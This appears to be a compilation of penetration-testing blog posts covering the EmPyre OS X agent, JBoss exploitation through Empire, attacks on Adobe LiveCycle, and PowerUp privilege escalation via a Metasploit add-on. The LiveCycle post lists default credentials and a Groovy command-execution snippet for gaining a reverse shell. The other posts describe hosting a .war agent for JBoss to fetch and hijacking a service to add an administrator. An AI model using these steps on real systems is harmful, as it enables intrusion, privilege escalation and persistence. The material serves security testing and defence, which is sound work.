Operating with EmPyre

If you’re reading this post, I sincerely hope you’ve already started with reading @harmj0y’s first blog post about EmPyre located here:http://www.harmj0y.net/blog/empyre/building-an-empyre-with-python/

This post is second in what will be a great series to help user’s understand and operate using EmPyre. Let’s get started!

Operating in an OS X environment may seem like a daunting task. Many people are under the assumption that merely using a Mac computer makes you or your organization secure. This blog post will cover why that is not necessarily true, how an attacker can effectively operate in an OS X or mixed environment and what defenders can do to avoid having their OS X infrastructure breached.

Every year, CVE Details reports on the number of distinct vulnerabilities found in software and operating systems. In 2015 OS X topped the list with a recorded 416 reported vulnerabilities.

stats

 

Compare that to Windows Server 2012’s 155 and you can see a huge difference in statistics. Operating from an OS X platform certainly does not mean you are more secure these days. Malware authors have taken notice to the rising market share of the OS X operating system and the numbers of malware for OS X are also climbing. In 2016, Carbon Black released a report titled “2015: The Most Prolific Year for OS X Malware”. In this report, Carbon Black research found 948 malware samples compared to 180 total for the years 2010 to 2014. Attackers are certainly finding ways to operate on the OS X platform.

empyre

 

As an attacker or security tester, options have been very limited on how to conduct operations against targets utilizing OS X. The Italian security firm “The Hacking Team” utilizes home-grown implants known as the Remote Code Systems (RCS) compromise platform to operate on OS X environments. For the rest of the world, you either have to create your own Remote Access Trojan or find another method for continuous operations. Enter EmPyre, an OS X/Linux offshoot of the PowerShell Empire project.

 

EmPyre was initially developed by @harmj0y in response to a client’s need for testing OS X platforms. The initial post on EmPyre may be found here containing more details of the RAT’s infrastructure and communications platform. I’m going to cover some of the tradecraft that was built into the RAT to support continuously operating in an OS X environment.

While operating from an OS X environment brings its own challenges, the methodology commonly used for penetration tests or red teams still applies.

methodology

During a penetration test or red team, gaining access can either be manually seeded by the client Point of Contact (POC) or phishing may be required. If you must conduct phishing to gain access, options are limited in comparison to those available to testers targeting Windows systems. Currently, EmPyre supports two payloads that may be used in a phishing attack. These payloads are Microsoft Office macros or an HTML page that calls an Applescript launcher based on CVE 2015-7007.

OS X environments provide some native situational awareness commands that typically aren’t available on other operating systems. Some examples are “pbpaste” for grabbing clipboard contents, “screencapture” for grabbing screenshots, and “curl” which and be useful for downloading files or data exfiltration. For the EmPyre RAT, we’ve used some lessons learned during operations to decrease the chances of detection. We’ve also taken these native methods and created non-native Python modules that perform the same action and are harder to detect. With EmPyre you’re also able to run port scans, query active directory, dump hashes, and perform all the standard post-exploitation functions.

hashdump

Privilege escalation from EmPyre is currently limited to spawning an agent using the “sudo” command. There have recently been several local privilege escalation exploits released for OS X in 2016. These have yet to be built into EmPyre and would be great way for the community to provide support to the project.

OS X has several mechanisms available to obtain persistence. Cronjobs allow for time-based persistence, login hooks allow for user login persistence, launch daemons that persist through reboots and much like Windows DLL hijacking, there’s DyLib hijacking based on the research of @patrickwardle. All of these methods have been built into EmPyre.

Finally, lateral movement is the last portion of tradecraft to cover. With Windows, there are many luxuries such as WMI, Pass-the-hash, executing files over UNC, WinRM and Remote Desktop Protocol. OS X provides us with SSH, if it’s enabled. Lessons learned from engagements show that it is usually turned on in a corporate environment as administrators need to admin somehow. EmPyre has modules to either launch SSH commands or send a launcher string for a new agent to a remote host. Pivoting from OS X to Windows becomes even trickier as there currently isn’t a solid Pass-the-Hash solution for OS X. EmPyre does, however, have a module to exploit JBoss on Windows via Java Serialization and that can send an agent callback to another Empire server.

In closing, we now understand that organizations who utilize OS X as a security boundary may not be doing themselves justice without a proper defense-in-depth approach. As research shows, OS X is prone to vulnerabilities just like other operating systems and software. With the proper tools such as EmPyre, a security tester can effectively perform security testing through a pure OS X or mixed environment. What does this mean for the blue teams out there? Email filters, blocking macros, host-based protection, network heuristics and log aggregation all still play in the defense-in-depth approach. We know that OS X has several commands that we should look for. Most of your users aren’t going to be running “pbpaste” from the terminal. Most users aren’t going to curl data out of your network either. Monitoring for subtleties like this can be a huge tip-off of malicious activity in the network.

Stay tuned for more in-depth blogs from other ATD members!

Get started with EmPyre here

 

Exploiting JBoss with Empire and PowerShell

When Empire was initially launched by @harmj0y and @sixdub at BSidesLV, I was immediately excited about the possibilities that a pure PowerShell RAT would bring to the offensive community. With what little free time I have, I’ve been working to add a few modules that have been inspired by recent engagements I’ve been on. This post will cover how to enumerate and exploit an internal web service through a deployed Empire agent without port scanning.

In this demonstration, I have an empire agent running on a Windows 7 host. The plan is to quietly enumerate the network for vulnerable web services and exploit one to move laterally.

screenshot1

First, I load the recon/find_fruit module and set the required options. The find_fruit module accepts CIDR ranges as well as single hosts. The module is also multi-threaded with a default setting of ten threads. One thing that makes this module great for red teaming or quieter penetration testing, is that unlike port-scanning, it uses legitimate web requests to check for web services that we commonly target such as Apache Tomcat, JBoss, Cold Fusion and more. The module will also accept a custom dictionary if desired. Kicking off the module I quickly find some “low hanging fruit” on a host in my target range.

screenshot2

Next, I want to create a payload and exploit the JMX-Console. Thanks to a stager by @ch33kyf3ll0w, Empire has the ability to generate java .war files for deploying agents. If you’re doing this outside of Empire, you can also generate a .war file using another @harmj0y script at https://gist.github.com/HarmJ0y/aecabdc30f4c4ef1fad3

screenshot3

Here I host the .war file with the python SimpleHTTPServer module. This is necessary as the jmx-console exploit will reach out to grab this file and deploy it on the target server.

screenshot4

Finally, I load the exploitation/exploit_jboss module and set the required options. I start by setting the JMXConsole switch to “true”. Next, The AppName needs to match the AppName I used when generating the .war file. I point the WarFile to my Python hosted file. Since I am tunnelling this exploit through an already deployed agent, I need to set the Agent option to deploy the exploit from. Empire will also let you know if this module is “opsec safe”, meaning it drops a file to disk.

screenshot5

Once the exploit is launched, I first see the HTTP request from the target server to grab the hosted .war file. After a few seconds, I am greeted by a new Empire agent!

If you’re looking for a way to enumerate and exploit internal web services without the noise of port-scanning, give this a try. The standalone Find-Fruit and Exploit-JBoss PowerShell scripts may be found on my github repository as well.

Scripts: https://github.com/rvrsh3ll/Misc-Powershell-Scripts

Empire http://www.powershellempire.com/

Leveraging Adobe LiveCycle

Adobe LiveCycle is an enterprise document and form platform that is being widely adopted by businesses and government agencies who are looking to centralize processes and document management capabilities. As with many web-based applications that connect to back-end systems, this provides additional attack surface that may be leveraged to gain a foothold into the target network. For defenders, this means ensuring LiveCycle administrators are exercising good security practices across the LiveCycle surface, which can be quite large as you’ll see in this post. LiveCycle works across many platforms as seen here and installations may vary. In this post, I’ll point out the areas of LiveCycle ES4 that may provide fruitful attack vectors to leverage on your next engagement.

LiveCycle has several access portals setup during the default installation that may provide access with default credentials. My experience has shown that Administrators have a tendency to change the main “adminui portal” password and overlook changing the OSGI administrative console password. Adobe was even kind enough to leave the OSGI console out of the “Next Steps” to perform after installation!

“OSGI provides developers with a way to create applications at a modular level, allowing the development and management of individual components that work together to form that larger puzzle as an adaptive and dynamic system.” – Source http://www.icidigital.com/osgi-with-cq5/

This console provides a very useful scripting console which we can leverage to further attack the system and possibly gain a system shell. Let’s run through an example of this attack path.

OSGI Attack Path:

The OSGI login uses Basic Authentication and can be typically accessed at “http[s]://[hostname]:[port]/lc/system/console”. The default credentials for this portal are admin:admin.

OSGI - Login1

Next, select “Script Console” under the main menu tab as shown.

OSGI - Menu

Now we are prompted with the scripting console where depending on the target setup, we can run various scripting languages.

Now, we use this script found at http://groovy.codehaus.org

def command = “””executable arg1 arg2 arg3″””
def proc = command.execute()
proc.waitFor()

println “return code: ${ proc.exitValue()}”
println “stderr: ${proc.err.text}”
println “stdout: ${proc.in.text}”

For example, we’ll call a simple directory command. Make sure you correctly escape as shown in the example and provide an absolute path for a Windows target. Linux targets will not require absolute paths.

OSGI - Win-Dir-CMD

In Linux you’ll most likely be an un-privileged user and need to escalate privileges. In Windows, we’re lucky enough that Adobe LiveCycle requires that the Administrator disable UAC during install and as you see next, should be running as system.

For this example, I decide to utilize PowerSploit to inject a reverse payload. Don’t forget to escape any additional quotes!

I had trouble with WP posting this as a code block so it’s an image.

powersploit-cmd

OSGI - Win-Meterpreter

Workspace Attack Path:

On a recent engagement I found the client had a custom application built that was accessible via the workspace path. Using the default credentials of atanaka:password, I was able to access the application that was obviously still being built. The application utilized the MYSQL database and was vulnerable to SQL Injection. It may be worth enumerating any custom-built LiveCycle applications that you run across. The default credentials I used are listed below from the sample setup utility.

Default URLS and Logins

To access the Correspondence Management Solution, you can access the solution template by using the following URL and login information:
URL from another computer: http://[host name]:8080/lc/cm/
URL from another computer if SSL was enabled: https://[host name]:8443/lc/cm/

Default user name: administrator
Default password: password

To access Administration Console, use the following URL and login information:

URL from another computer: http://[host name]:8080/adminui
URL from another computer if SSL was enabled: https://[host name]:8443/adminui

Default user name: administrator
Default password: password

To access the CRX Package Manager, use the following URL and login information:

URL from another computer: http://[host name]:8080/lc/crx/packmgr/index.jsp
URL from another computer if SSL was enabled: https://[host name]:8443/lc/crx/packmgr/index.jsp
Default user name: administrator
Default password: password

To access Mobile Forms Installation Verification Sample (IVS) application, use the following information:

URL from another computer: http://[host name]:8080/mobileformsivs
URL from another computer if SSL was enabled: https://[host name]:8443/mobileformsivs

If you have installed and deployed Reader Extensions, access the web application as follows:

URL from another computer: http://[host name]:8080/ReaderExtensions
URL from another computer if SSL was enabled: https://[host name]:8443/ReaderExtensions

Default user name: administrator
Default password: password

If you have installed and deployed Process Management, access the Workspace web application as follows:

Flex Workspace:

URL from another computer: http://[host name]:8080/workspace
URL from another computer if SSL was enabled:https://[host name]:8443/workspace

HTML Workspace:
URL from this computer: http://localhost:8080/lc/content/ws
URL from another computer: http://[host name]:8080/lc/content/ws
URL from another computer if SSL was enabled:https://[host name]:8443/lc/content/ws

Default user name: administrator
Default password: password

Additional default credentials that may be installed. These credentials are available if the administrator utilized the Adobe Sample Setup Utility.

 

User Name
Password
Email
Role
atanaka password atanaka@sampleorganization.com LiveCycle Application Administrator
LiveCycle Workspace User
LiveCycle Contentspace Administrator
LiveCycle Contentspace User
jjacobs password jjacobs@sampleorganization.com LiveCycle Workspace User
LiveCycle Contentspace User
srose password srose@sampleorganization.com LiveCycle Workspace User
LiveCycle Contentspace User
kbowman password kbowman@sampleorganization.com LiveCycle Workspace User
LiveCycle Contentspace User

Point-Click-Powershell-Pwn

Powershell tools have become a must-have for security professionals in recent years. A few notable tools to mention are PowerSploit, Veil-PowerView, PowerUp and Nishang among others. These tools have each provided value to the Penetration Tester’s arsenal but, they require the tester to utilize some manual practices to employ them on target systems. It is one of my goals make Powershell tools a bit more automated and easier to use during penetration tests by utilizing the power of Cortana and Metasploit. As a result, I have created POSH-Commander to start bringing Powershell tools into the Armitage/Cobalt-Strike interface to improve speed and efficiency on engagements. There is an included Metasploit module remote_powershell.rb that may also be run independently to execute your remotely-hosted Powershell scripts.

In this scenario we are targeting a Windows 7 client connected to a Windows Server 2008 domain controller running Active Directory. The user is a standard domain user with no Administrative privileges. Once we have popped a Meterpreter shell, right-clicking on the host will present a POSH-Commander menu to select Veil-PowerView, PowerUp or a custom script.

p1pic1

For this demonstration, I am going to select PowerUp to see if we have any available options for privilege escalation.

p1pic2

With all modules, you will be presented with a text prompt if you would like to add additional arguments to the command. Please consult the directions in each script for possible arguments to use with each function. Here, I have selected to run the “Invoke-AllChecks” function with no additional arguments.

p1pic3

Once the results return, we see that we have permissions to write to the service-binary of the VMTools service. With this information, I can utilize the “Invoke-ServiceUserAdd” function in PowerUp to manipulate the service to add a local user in the Administrative group for us. This function stops the service, modifies it to create a user, starts the modified service to create our user, stops it again and restores it back to original. Pretty sweet huh?

p1pic4

 

We right-click the host again and select the PowerUp menu. You’ll notice, you’re provided a new tab for these results so that your previous results stay in their own tab. This time I opt to add arguments to the command as I need to specify the service to manipulate and click “OK” to run the module.

p1pic5

Success! The module has returned “True” telling me that the command has completed successfully and added the script’s default user “John” to the local Administrator’s group. Let’s check.

p1pic6

Interacting with a shell prompt, I run “net user” to check the local users on the target. You can see that “john” has been added to the local users.

 

This is just one of many possibilities utilizing Cortana/Metasploit and some very handy Powershell scripts. For more information on the scripts mentioned in this post, please visit the links below.

 

http://blog.harmj0y.net
http://github.com/harmj0y
https://github.com/Veil-Framework/Veil-PowerView